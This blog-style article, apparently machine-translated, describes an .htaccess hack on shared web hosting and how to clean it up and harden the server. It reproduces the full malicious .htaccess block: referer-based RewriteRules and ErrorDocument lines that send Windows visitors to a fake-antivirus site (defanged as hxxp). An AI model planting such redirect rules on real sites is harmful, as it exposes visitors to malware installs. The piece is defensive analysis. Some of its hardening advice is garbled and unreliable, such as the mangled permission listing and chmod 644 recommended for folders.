A new form of virus about which I see that not much is known, affects hosted sites on unsafe servers where the accounts of the user / subdomen's accounts can “see” between them. Specifically the hosting accounts are all put in the folder “vhosts“, and the right of writing of the user folder FROM “vhosts” is given on a general user… of resetting in most situations. It is a typical web method of servers that do not use WHM/cPanel.
content
The action of the .htaccess virus – .htaccess Hack
virus affects the files .htaccess of the victim site. Are added lines / directive which will Redirect visitors (Come from Yahoo, MSN, Google, Facebook, Yaindex, Twitter, Myspace, etc. Sites and portals with high traffic) to some sites that offer “Antivirus solutions“. It's about Fake antivirus solutions, which I wrote in the introduction of Fake Antivirus Remover.
Here's how a .htaccess affected: (Do not access the URLs from the contents of the lines below)
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3RewriteEngine On
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
rewritecond %{http_referer} .*wikipedia.*$ [nc,or]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=r [R,L]RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=4 [R,L]
Those who use WordPress will find these lines in the file .htaccess FROM public_html. In addition, the virus creates an identical .htaccess in the folder wp-content.
*There are also situations where instead of peoriavascularsurgery.com appears dns.thesoulfoodcafe.com or other addresses.
What this virus does.
Once redirected, the visitor is greeted with the arms open by the message:
Warning!
Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti virus check!
System Security will perform a quick and free scanning of your PC for viruses and malicious programs.
No matter what button we press, we are taken to the page of “My Computer“, created to imitate XP design. Here it starts automatically “the scan process”, at the end of which we discover that “We are infected”.
After we press OK or Cancel, it will start downloadto a file setup.exe. This setup.exe is the false anti virus which affect the system. Will install a series of malware applications that further propagate viruses, and besides a software anti-virus (all false) that the victim is invited to buy.
Those who have already contacted this form of virus can use Fake Antivirus Remover. The entire HDD scan is also recommended. recommend Kaspersky Internet Security or Kaspersky Anti Virus.
This form of virus affects visitors' operating systems with operating systems Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 and Windows 95. So far no cases of infection of the operating systems Windows Vista and Windows 7 are known.
How we can remove this .htaccess virus from the server and how we can prevent infection.
1. Analysis of files and deletion of suspicious codes. To ensure that the file is not only affected .htaccess It's good to We analyze all files .php and .js.
2. We rewrite the .htaccess file and set them chmod 644 or 744 with writing rights only on user-ul owner.
3. When creating a hosting account for a site, in the folder /home or /webroot A folder will be automatically created that most often has the name of the user (user for cpanel, ftp, etc.). To prevent data writing and transmission of viruses from one user to another, it is indicated that each user folder will be set:
Chmod 644 Sau 744, 755 – indicated is 644.
chown -R nume_user nume_folder.
chgrp -R nume_user nume_folder
ls -all to check if the modes have been placed correctly. Something must appear in the kind:
drwx–x–x 12 dinamics dinamics 4096 May 6 14:51 dinamics/
drwx–x–x 10 duran duran 4096 Mar 7 07:46 duran/
drwx–x–x 12 tubes tubes 4096 Jan 29 11:23 tubes/
drwxr-xr-x 14 express express 4096 Feb 26 2009 express/
DRWXR-X 9 those 4096 May 19 01:09 those /
drwx–x–X 9 Farm Farm 4096 Dec 19 22:29 Farm/
If one of the above users will have on FTP virus files, it will not be able to send the virus to another Hostat user. It is a minimum safety measure to protect the Hostate accounts on a web server.
Common elements of the areas affected by this type of virus.
All affected areas redirect visitors to sites that by domain name contain “/main.php?e=4&h“.
This “virus de .htaccess” affect any type of CMS (Joomla, WordPress, phpBB, etc.) that uses .htaccess.
.htaccess Virus Hack & Redirect.
